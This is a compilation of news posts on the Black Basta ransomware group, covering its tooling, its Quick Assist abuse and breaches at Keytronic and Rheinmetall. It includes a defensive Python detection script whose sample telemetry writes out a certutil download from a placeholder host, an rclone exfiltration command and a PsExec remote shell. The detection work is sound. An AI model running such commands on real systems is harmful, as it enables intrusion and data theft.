
Black Basta Unleashes Custom Malware Following Qakbot Takedown

 


Following last year's takedown of the Qakbot botnet, the Black Basta ransomware group has shifted strategy, relying on new custom tools and initial access techniques in the wake of this year's law enforcement efforts against the threat. In the face of escalating pressure on ransomware gangs, Black Basta has shown considerable resilience and adaptability, adding custom tools and tactics developed to conceal its presence.

With more than 500 victims compromised, the group's evolution illustrates the resilience of cybercriminals who have had to change tactics in response to law enforcement actions and other disruptions, experts say. Although cybercriminals have faced numerous such disruptions, their operations continue to flourish. Black Basta has attacked companies around the world since at least the second week of April 2022.

Little other information is currently available about the ransomware gang, since it has not yet advertised itself to the hacking community or recruited affiliates through hacking forums. Judging by how rapidly it has accumulated new victims and how its negotiations have been conducted, however, it is not necessarily a new operation; it is more likely a rebrand of an established top-tier ransomware gang that brought its affiliates along. The group uses a double-extortion strategy, combining data theft with encryption and demanding large ransom payments that can easily reach millions of dollars.

In its earlier campaigns, the ransomware gang gained access to corporate networks through a partnership with the QBot botnet. After law enforcement disrupted QBot, according to Mandiant, the gang had to form new partnerships in order to keep breaching corporate networks. Further, in the course of tracking the threat actor it designates UNC4393, Mandiant has identified new malware and tools being used in Black Basta intrusions, demonstrating the attackers' evolution and resilience.

Black Basta has had a busier year than most gangs, with its members compromising some of the largest companies and brands in the world, including Veolia North America, Hyundai Motor Europe, and Keytronic. One of the most telling signs of the threat group's sophistication is its access to zero-day exploits, such as an exploit for a Windows privilege elevation flaw (CVE-2024-26169) and one for a VMware ESXi authentication bypass flaw (CVE-2024-37085).

The most defining characteristic of Black Basta has been its prolific use of Qakbot, distributed through sophisticated, evolving phishing campaigns, which built the group's reputation. Qakbot is a Trojan initially deployed to gain access to a victim's computer; once in place, it can deploy a wide array of other tools, including publicly available open-source utilities and the gang's name-branded ransomware. After about a year, the Qakbot botnet went mostly out of commission (though it has since resurfaced) following the law enforcement campaign called Operation Duck Hunt, forcing the group to find new ways of accessing victim infrastructure.

The Mandiant research team revealed in a blog post published this week that Black Basta initially used phishing and even vishing to spread other types of malware, such as DarkGate and Pikabot, but within a short period began looking for alternative methods to spread many more threats. According to Mandiant researchers in a post published last month, the group, known as UNC4393, has settled into a phase of transition in recent attacks: it is no longer using readily available tools but rather developing custom malware, relying more heavily on access brokers, and diversifying its initial access techniques.

When the FBI and DOJ shut down QBot's infrastructure in late 2023, Black Basta turned to other initial access distribution clusters, most notably those delivering DarkGate malware. Later, Black Basta switched to SilentNight, a backdoor with keylogging capability, for initial access, marking a shift away from phishing as the primary method of entering a network.

For example, one process by which the group gains initial access involves deploying the SilentNight backdoor, which the group used in 2019 and 2021 but then put on hold until it was reactivated last year. Earlier this year, Black Basta also began incorporating malvertising into its operations, a significant departure from its previous sole reliance on phishing for initial access. Cybersecurity researchers highlighted this shift in a detailed post, emphasizing the strategic evolution of Black Basta's methods.

SilentNight, a sophisticated C/C++ backdoor, has been identified as a critical component of Black Basta's recent campaigns. This malware communicates via HTTP/HTTPS and potentially employs a domain generation algorithm for its command and control (C2) infrastructure. The backdoor boasts a modular framework, which supports an array of plug-ins providing extensive functionality. These capabilities include system control, screenshot capture, keylogging, file management, and cryptocurrency wallet access. 

Notably, SilentNight also targets credentials through browser manipulation, making it a versatile and potent tool in Black Basta's arsenal. Upon gaining access to targeted environments, Black Basta employs a combination of living-off-the-land (LotL) techniques and custom malware to maintain persistence and facilitate lateral movement. This preparation stage precedes the deployment of ransomware. Researchers have noted that the ultimate objective of UNC4393, the group behind Black Basta, is to rapidly gather and exfiltrate as much data as possible. 

The collected data is then used in multi-faceted extortion schemes, where the threat of data leakage is leveraged to coerce victims into meeting ransom demands. Mandiant's latest report indicates a notable transition within Black Basta from the use of publicly available tools to the deployment of internally developed custom malware. This shift underscores the group’s adaptability and the ongoing threat it poses to organizations of all sizes. 

A security expert emphasized this resilience, pointing out that despite moving away from phishing—a highly successful cybercrime technique—Black Basta continues to present a significant risk. Erich Kron, a security awareness advocate at KnowBe4, commented on the group's operational capabilities, noting, "Given the success of this gang, there's no doubt they have a considerable amount of funds stocked away in their war chest, allowing them to develop their tools and improve their ability to attack." 

This financial backing enables Black Basta to innovate continuously, enhancing its tools and techniques to outmanoeuvre defences. Mandiant researchers further stressed the importance for defenders to adopt a proactive stance, fortifying their security measures with cutting-edge technology and up-to-date threat intelligence. Black Basta's recent attacks have continued to exploit "living off the land" binaries and readily available tools, such as the Windows certutil command-line utility for downloading SilentNight and the Rclone tool for data exfiltration. 

In conclusion, Black Basta remains a formidable global threat and one of the leading entities in the ransomware landscape. Their ability to adapt and evolve necessitates vigilance and advanced defensive strategies from cybersecurity professionals worldwide.

Are We Ready for the Next Wave of Cyber Threats?



In our increasingly digital world, cybersecurity is a growing concern for everyone, from businesses and governments to everyday individuals. As technology advances, it opens up exciting possibilities and creates new, sophisticated cyber threats. Recent high-profile attacks, like those on Ascension and the French government, show just how damaging these threats can be.

Cybercriminals are always finding new ways to exploit weaknesses. According to Cybersecurity Ventures, global cybercrime damages could hit $10.5 trillion a year by 2025. This huge number highlights why strong cybersecurity measures are so important.

One major evolution in cyber threats is seen in ransomware attacks. These attacks used to be about locking up data and demanding a ransom to unlock it. Now cybercriminals also steal data and threaten to release it publicly, which can disrupt businesses and ruin reputations. For example, in May, the Black Basta group attacked Ascension, the largest non-profit Catholic health system in the U.S., disrupting operations in its 140 hospitals and affecting patient care.

Supply chain attacks are another big concern. These attacks target vulnerabilities in the network of suppliers and partners that businesses rely on. This makes securing the entire supply chain crucial.

Cybercriminals are also using artificial intelligence (AI) to make their attacks more powerful. Examples include DeepLocker, a type of AI-powered malware that stays hidden until it reaches its target, and deepfake scams, where AI creates fake videos or audio to trick people into transferring money. AI-driven malware can change its behaviour to avoid detection, making it even more dangerous.

Distributed denial-of-service (DDoS) attacks are another serious threat. These attacks flood a website or network with so much traffic that it can’t function. In March 2024, a massive DDoS attack targeted over 300 web domains and 177,000 IP addresses linked to the French government, causing major disruptions.

Building a Strong Cybersecurity Defense

To fight these evolving threats, businesses need to build strong cybersecurity defenses. One effective approach is the zero-trust model, which means every access request is verified, no matter where it comes from. Key parts of this model include multi-factor authentication (MFA), which requires more than one form of verification to access systems, and least privilege access, which ensures users only have access to what they need to do their job.

Advanced monitoring tools are also essential. Security information and event management (SIEM) systems, combined with AI-driven analytics, help detect and respond to threats in real time by providing a comprehensive view of network activities.

Human error is a major vulnerability in cybersecurity, so employee training and awareness are crucial. Regular training programs can help employees recognise and respond to threats like phishing attacks, creating a culture of security awareness.

The Role of AI in Cybersecurity

While AI helps cybercriminals, it also offers powerful tools for defending against cyber threats. AI can analyse vast amounts of data to spot patterns and anomalies that might indicate an attack. It can detect unusual behaviour in networks and help security analysts respond more quickly and efficiently to threats.

AI can also identify and mitigate insider threats by analysing user behaviour and spotting deviations from typical activity patterns. This helps strengthen overall security.

The future of cybersecurity will involve constant innovation and adaptation to new challenges. AI will play a central role in both defence and predictive analytics, helping foresee and prevent potential threats. Ethical considerations and developing frameworks for responsible AI use will be important.

Businesses need to stay ahead by adopting new technologies and continuously improving their cybersecurity practices. Collaboration between industries and with government agencies will be crucial in creating comprehensive strategies.

Looking to the future, we need to keep an eye on potential threats and innovations. Quantum computing promises new breakthroughs but also poses a threat to current encryption methods. Advances in cryptography will lead to more secure ways to protect data against emerging threats.

As cyber threats evolve, staying informed and adopting best practices are essential. Continuous innovation and strategic planning are key to staying ahead of cybercriminals and protecting critical assets.


Securing Sensitive Data: Lessons from Keytronic’s Recent Breach


Keytronic, a prominent printed circuit board assembly (PCBA) manufacturer, recently confirmed a significant data breach. The breach occurred after the Black Basta ransomware gang leaked over 500GB of the company’s stolen data. In this blog post, we delve into the details of the breach, its impact, and Keytronic’s response.

The Breach Details

Attack Timeline 

The breach came to light two weeks ago when Black Basta claimed responsibility for the attack. Keytronic had reported the cyberattack in an SEC filing over a month ago, on May 6.

Operational Disruption 

The attack disrupted Keytronic’s operations, limiting access to critical business applications. As a result, the company had to shut down domestic and Mexico operations for two weeks to address the incident.

Stolen Data

The stolen data included sensitive human resources, finance, engineering, and corporate information. Black Basta shared screenshots of employees' passports, social security cards, customer presentations, and corporate documents.

As required by new SEC rules, the company has also stated that the attack and loss of production will have a material impact on its financial position in the fourth quarter of 2024, ending on June 29.

Impact and Response

Personal Information Compromised: Keytronic confirmed that personal information was stolen during the breach. The threat actor accessed and exfiltrated limited data from the company’s environment, including personally identifiable information.

Financial Implications: The resulting production loss could impact Keytronic’s financial condition for the fourth quarter, which ends on June 29. The company incurred approximately $600,000 in expenses for external cybersecurity experts, with more costs anticipated.

Lessons Learned

The company has already spent around $600,000 on hiring external cybersecurity experts and expects to pay more. While Keytronic could not identify a specific threat group, the Black Basta ransomware organization claimed the attack two weeks ago, revealing what they claim is all of the stolen data.

The threat actors say that the attack stole human resources, finance, engineering, and business data, and they have shared photos of employee passports and social security cards, as well as customer presentations and company documents.

Black Basta Ransomware

The Black Basta ransomware operation began in April 2022 and is thought to be made up of former members of the Conti ransomware operation, which broke into smaller groups after it shut down.

Black Basta has since grown to be one of the biggest and most damaging ransomware operations, responsible for a large number of attacks, including those against Capita, Hyundai's European division, the Toronto Public Library, the American Dental Association, and, most recently, a ransomware attack on U.S. healthcare giant Ascension.

Between April 2022 and May 2024, the ransomware operation breached 500 businesses and stole data from at least 12 of the 16 critical infrastructure sectors, according to CISA and the FBI.

Cybercriminals Exploit Windows Quick Assist in Latest Ransomware Campaign

 

A recent wave of cyberattacks has seen financially motivated criminals leveraging Windows Quick Assist, a built-in remote control and screen-sharing tool, to deploy Black Basta ransomware on victim networks. Microsoft has investigated these attacks since mid-April 2024, identifying the threat group behind them as Storm-1811.

The attacks typically begin with email bombing, where the target's inbox is flooded with spam emails. This overload is followed by a phone call from the attackers, who impersonate Microsoft technical support or the victim's IT help desk. They offer to help resolve the spam issue, tricking victims into granting remote access via Quick Assist.

Once access is granted, the attackers execute a scripted command to download malicious files, including Qakbot malware, remote monitoring tools like ScreenConnect and NetSupport Manager, and the Cobalt Strike framework. These tools enable the attackers to perform domain enumeration and move laterally across the network. Eventually, they deploy Black Basta ransomware using PsExec, a telnet-replacement tool.

Rapid7, a cybersecurity company that also detected these attacks, noted that attackers use batch scripts to harvest credentials from the command line using PowerShell. These credentials are often exfiltrated to the attackers' server via Secure Copy (SCP). In some cases, credentials are saved to an archive for later retrieval.
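As an added defender-side example (not code from the posts, Microsoft, Rapid7 or Mandiant), the script below runs simple process-creation heuristics over constructed sample events: the certutil downloads and Rclone exfiltration noted in the first post, the PsExec and SCP use described here, and a 30-minute correlation that escalates any of those hits when Quick Assist was launched on the same host shortly before. The event schema, host and user names, URL and time window are all assumptions made for the demonstration.

```python
"""Heuristic detections for the living-off-the-land chain described above.

Constructed example: the event fields and every sample value (hosts, users,
URLs, paths) are invented for this demonstration and are not real telemetry.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed schema, not a vendor format)."""
    ts: datetime
    host: str
    user: str
    image: str      # executable file name only, e.g. "certutil.exe"
    cmdline: str


@dataclass(frozen=True)
class Finding:
    ts: datetime
    host: str
    rule: str
    severity: str   # "medium", or "high" when Quick Assist was recently active


# How long after a Quick Assist launch we treat suspicious activity on the
# same host as likely hands-on-keyboard activity via the remote session.
QUICK_ASSIST_WINDOW = timedelta(minutes=30)
EXFIL_TOOLS = {"rclone.exe", "scp.exe", "pscp.exe"}
REMOTE_EXEC_TOOLS = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
PS_DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")


def classify(ev: ProcEvent) -> Optional[str]:
    """Return the rule an event matches, or None for unremarkable activity."""
    img = ev.image.lower()
    cmd = ev.cmdline.lower()
    # certutil used as a downloader (the posts note it fetching SilentNight)
    if img == "certutil.exe" and "urlcache" in cmd and "http" in cmd:
        return "lolbin_download_certutil"
    # PowerShell download cradles of the kind batch scripts invoke
    if img == "powershell.exe" and any(m in cmd for m in PS_DOWNLOAD_MARKERS):
        return "lolbin_download_powershell"
    # Rclone / SCP data exfiltration
    if img in EXFIL_TOOLS:
        return "exfil_tool_execution"
    # PsExec used to push the ransomware to other hosts
    if img in REMOTE_EXEC_TOOLS:
        return "psexec_remote_execution"
    return None


def detect(events: List[ProcEvent]) -> List[Finding]:
    """Scan events in time order; escalate hits that follow a Quick Assist launch."""
    findings: List[Finding] = []
    last_quick_assist: Dict[str, datetime] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.image.lower() == "quickassist.exe":
            last_quick_assist[ev.host] = ev.ts
            continue
        rule = classify(ev)
        if rule is None:
            continue
        qa = last_quick_assist.get(ev.host)
        recent_qa = qa is not None and ev.ts - qa <= QUICK_ASSIST_WINDOW
        findings.append(Finding(ev.ts, ev.host, rule, "high" if recent_qa else "medium"))
    return findings


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample telemetry: one host shows the Quick Assist -> certutil
# sequence, two others show exfiltration and PsExec without a Quick Assist
# session, and one certutil use is legitimate certificate verification.
SAMPLE_EVENTS = [
    ProcEvent(parse_ts("2024-05-09T14:00:00"), "ws02", "CORP\\itops",
              "certutil.exe", "certutil.exe -verify C:\\certs\\server.cer"),
    ProcEvent(parse_ts("2024-05-10T09:01:12"), "ws01", "CORP\\jdoe",
              "QuickAssist.exe", "QuickAssist.exe"),
    ProcEvent(parse_ts("2024-05-10T09:06:40"), "ws01", "CORP\\jdoe", "certutil.exe",
              "certutil.exe -urlcache -split -f http://example.invalid/u.dat C:\\Users\\Public\\u.dat"),
    ProcEvent(parse_ts("2024-05-10T09:07:05"), "ws01", "CORP\\jdoe",
              "notepad.exe", "notepad.exe"),
    ProcEvent(parse_ts("2024-05-10T11:20:00"), "srv-files", "CORP\\svc_backup",
              "rclone.exe", "rclone.exe copy D:\\Finance remote:bucket --transfers 8"),
    ProcEvent(parse_ts("2024-05-10T12:40:00"), "ws07", "CORP\\admin",
              "PsExec.exe", "PsExec.exe \\\\dc01 -s cmd.exe"),
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.ts.isoformat()} {f.host:<10} {f.severity:<6} {f.rule}")
```

Run against the sample set, the certutil download on ws01 is escalated to high because Quick Assist started there five minutes earlier, while the Rclone and PsExec hits on other hosts stay at medium and the legitimate certutil -verify produces nothing.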

To mitigate these attacks, Microsoft advises organisations to disable or uninstall Quick Assist and similar remote tools if they are not used. Employees should be trained to recognise tech support scams and instructed to only allow remote access if they initiated the contact with IT support. Suspicious Quick Assist sessions should be immediately disconnected.

The Black Basta ransomware operation emerged after the Conti cybercrime group disbanded two years ago following multiple data breaches. Black Basta began operating as a Ransomware-as-a-Service (RaaS) in April 2022 and has since attacked numerous high-profile targets, including defence contractor Rheinmetall, technology company Capita, Hyundai's European division, and the American Dental Association.

Recent attacks linked to Black Basta include a ransomware incident at U.S. healthcare giant Ascension, which disrupted ambulance services. According to a joint advisory by CISA and the FBI, Black Basta affiliates have breached over 500 organisations across 12 out of 16 critical infrastructure sectors since April 2022, causing data breaches and encryption.

Health-ISAC, an information sharing and analysis centre, has warned of increased attacks against the healthcare sector by Black Basta. Research by Elliptic and Corvus Insurance indicates that the group has extorted at least $100 million in ransom payments from over 90 victims by November 2023.

Microsoft is enhancing Quick Assist to improve transparency and trust between users, including adding warning messages to alert users about potential scams. Rapid7 observed similar scams targeting their customers, with attackers using other remote monitoring tools like AnyDesk.

To prevent such attacks, organisations should block unapproved remote management tools and train staff to recognise and report suspicious calls and messages. Quick Assist should only be used if the interaction was initiated by contacting official support channels.

The recent misuse of Windows Quick Assist to deploy Black Basta ransomware underlines the need for increased vigilance and robust cybersecurity practices to protect digital assets from social engineering attacks of this kind.


New Ransomware Threat Hits Hundreds of Organisations Worldwide

 


In a recent joint report by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), a new ransomware gang named Black Basta has been identified as breaching over 500 organisations globally between April 2022 and May 2024. This group has targeted various sectors, including healthcare, spanning across North America, Europe, and Australia.

Black Basta, which emerged as a Ransomware-as-a-Service (RaaS) operation in April 2022, has quickly gained notoriety by attacking numerous high-profile victims such as Rheinmetall, Hyundai, Capita, and the American Dental Association, among others. Believed to have connections to the former Conti cybercrime syndicate, Black Basta operates with sophistication and a steady stream of initial access to its targets.

One of the key tactics employed by Black Basta involves stealing corporate data before encrypting a company's devices. The stolen data is then used in double-extortion attacks, in which victims are told to pay a ransom to prevent the publication of their sensitive information. The gang's data leak site, 'Black Basta Blog' or 'Basta News,' lists victims and progressively releases data to pressure them into paying the ransom.

Technical analysis reveals that Black Basta utilises the ChaCha20 encryption algorithm to encrypt files, rendering them inaccessible without the decryption key. Victims are left with a custom extension appended to their encrypted files (.basta), along with a ransom note providing instructions on how to negotiate with the threat actors.

Responding to this spreading threat, federal agencies advise organisations to keep operating systems up to date, employ phishing-resistant Multi-Factor Authentication (MFA), and train users to identify and report phishing attempts. Moreover, securing remote access software and implementing the recommended mitigations are essential steps in reducing the risk posed by Black Basta and similar ransomware attacks.

Healthcare organisations are particularly vulnerable, given their size, technological reliance, and access to sensitive patient information. CISA and the FBI have suggested adhering to the StopRansomware Guide in order to avoid potential attacks in the healthcare sector.

Recent incidents, including an attack on healthcare giant Ascension, accentuate the urgency of addressing the threat posed by Black Basta. With the gang's ability to readily expand its victim pool and employ coercive tactics, organisations must remain particularly careful and implement robust cybersecurity measures to mitigate the risk of falling victim to ransomware attacks.

Considering the course of events, cybersecurity experts emphasise the importance of proactive measures, including regular backups, system updates, and employee training, to strengthen defences against ransomware threats like Black Basta. This calls for collective efforts to combat the growing menace of ransomware and protect critical infrastructure from malicious actors.


Rheinmetall Hit by BlackBasta Ransomware: Disruption to Arms Production

Arms manufacturer Rheinmetall has recently confirmed that it fell victim to a ransomware attack orchestrated by the BlackBasta ransomware group. The cyberattack has caused significant disruption to the company's operations, including its arms production capabilities.

Rheinmetall, a prominent German defense contractor, specializes in manufacturing a wide range of military and security equipment. The attack on such a high-profile player in the defense industry underscores the growing threat of ransomware attacks targeting critical infrastructure and sensitive sectors.

The BlackBasta ransomware group, known for its aggressive tactics and targeting of large organizations, has been identified as the perpetrator of the attack. The group employs sophisticated techniques to infiltrate and encrypt the victim's systems, demanding a ransom payment in exchange for the decryption keys.

Rheinmetall has not disclosed the specific ransom amount demanded by the attackers or whether it has chosen to engage in negotiations. However, the incident highlights the potentially devastating impact that ransomware attacks can have on crucial industries, potentially leading to operational disruptions and financial losses.

The immediate consequences of the attack have been felt within Rheinmetall's production facilities, causing delays and interruptions to ongoing arms manufacturing processes. The company has initiated an extensive investigation to assess the extent of the breach and mitigate any potential long-term damage to its operations and reputation.

In response to the attack, Rheinmetall has taken immediate measures to contain the breach and secure its systems. It has engaged external cybersecurity experts to assist in the recovery process and strengthen its defenses against future threats. Additionally, the company has implemented stringent security protocols and is enhancing employee training on cybersecurity best practices.

The incident involving Rheinmetall serves as a stark reminder to organizations across all sectors of the critical importance of maintaining robust cybersecurity measures. Ransomware attacks continue to evolve in sophistication and scale, targeting both public and private entities. The consequences of a successful attack can be severe, ranging from financial losses to reputational damage and even threats to national security.

Organizations must adopt a proactive approach to cybersecurity, including regular system updates, robust backup procedures, and comprehensive incident response plans. By prioritizing cybersecurity measures, organizations can minimize the risk of falling victim to ransomware attacks and other cyber threats.

Cyberattack by Black Basta Gang Using Qakbot Malware

 


In an aggressive and widespread campaign, the Black Basta ransomware gang is using Qakbot malware - also referred to as QBot or Pinkslipbot - delivered as an .IMG file, as its initial vector of compromise. This campaign has targeted 10 to 15 different customers over the last two weeks, with a majority of the focus on US-based companies.

A threat advisory published by Cybereason Global SOC (GSOC) on November 23 states that the infection is typically initiated by spam or phishing emails containing malicious links, and that Black Basta mainly uses Qakbot to maintain a foothold on victims' networks, with malicious URL links as its primary method of spreading the infection.

"The Black Basta ransomware gang is using Qakbot malware to construct an initial point of entry within a target organization's network, allowing it to move laterally and further infiltrate the network," according to the report. 

Several groups have augmented Qakbot's functionality with additional modules, which have proven useful for information theft, backdoors, and downloaders. Qakbot has also adopted a new method of delivering its malicious payload: instead of JavaScript, it now uses Visual Basic.

Researchers noted that during the compromise of the domain controller, the threat actor also used Cobalt Strike to gain remote access to the server and capture data from the machine. The attacker then released the ransomware, which in turn disabled security mechanisms such as intrusion detection and prevention systems and anti-virus programs.

The report highlights the speed of the attacks as one of the most concerning aspects: the threat actor obtained domain administrator privileges within two hours of gaining access, and ransomware was deployed within half a day.

GSOC observed that in more than one attack the threat actor disabled DNS services, locking the victim out of the network and making recovery from the attack more difficult.

"Taking all of these observations into consideration, we recommend that security and detection teams keep an eye out for this campaign, which can quickly deteriorate IT infrastructure," the report reads. 

Organizations are advised to take proactive measures such as identifying and blocking malicious network connections, resetting Active Directory access, engaging in incident response efforts, and cleaning up compromised machines, as described in the report. 


Adding capabilities to Qakbot's operations 


There has been an uptick in operations by the Qakbot group lately. Over the past couple of years, they have infected systems, installed attack frameworks, and sold access to other groups, including the Black Basta group. 

As the group continues to expand its access-as-a-service operation, it has compromised hundreds of companies with common second-stage payloads, including Emotet malware and two popular attack frameworks, enabling it to conduct more attacks.

Several Qakbot operators were observed using DLL sideloading to deliver malware. This is a technique that allows legitimate and malicious files to be placed together in the same directory to escape detection. 

Black Basta linked to FIN7


As one of the most prolific ransomware families in recent years, Black Basta is offered as ransomware-as-a-service on underground forums in several countries, which means multiple operators may have Black Basta in their toolkit, making it difficult to attribute the malware to any particular operator.

Although the group has been operating since at least February, its existence was only detected two months later. A Linux variant of the ransomware targets VMware ESXi virtual machines, encrypting files in a specific volume folder. The group operates globally and mainly targets English-speaking countries.

Black Basta is one of the most prominent cybercrime operations that has emerged recently, and according to researchers at SentinelOne, it has been associated with FIN7, a group of financially motivated cybercriminals estimated to have stolen well over $1.2 billion since its inception in 2012.

IBM X-Force Finds New Ransomware Group Black Basta

IBM Security X-Force has been keeping an eye on Black Basta, the latest ransomware gang, which first surfaced in April 2022. So far, Black Basta has claimed attacks on over 29 different targets in various industries using double extortion techniques. In double extortion, the threat actors execute ransomware, steal data, and blackmail the victim by threatening to post it publicly unless their ransom demands are met.

The group's data leak site is hosted on the Tor network. To pressure the victim into paying the ransom, the Black Basta group progressively publishes the stolen data on the leak site. The group still appears to be in the early phase of its organization: X-Force has not found any evidence of it distributing the malware or recruiting threat actors on underground platforms or the dark web.

Because of similarities in operations and the absence of affiliate recruitment, experts believe that Black Basta is a new version of the Conti gang, an infamous ransomware group that already had various affiliates. The Conti group, however, recently announced that it has no links with the Black Basta ransomware group. X-Force is currently investigating the relationship between the two.

The Black Basta ransomware gang works at a very high pace; it rarely alerts cybersecurity defenders, and by the time they realize, the damage has already been done. Experts say Black Basta does not appear to target specific industries or verticals. Organizations that collect large quantities of data, such as personally identifiable information (PII), financial credentials, and other sensitive information, are easy targets for extortion attacks, however.

Concerned users can read IBM X-Force Definitive Guide to Ransomware and follow some basic guidelines:

  • Maintain routine backups, both online and offline; a robust backup mechanism helps in recovery from a ransomware attack.
  • Build a plan to protect against unauthorized data theft, especially where it concerns uploading large amounts of data to trusted cloud platforms that threat actors might exploit.
  • Apply user behavior analytics to predict security incidents. If triggered, assume a breach has happened: audit, monitor, and act quickly on activity associated with privileged accounts and groups.
  • Implement two-factor authentication on each remote access point into the organization's network; special attention should be given to disabling or securing remote desktop protocol (RDP) access. Various ransomware attacks in the past have exploited weak RDP access to gain early access to a network.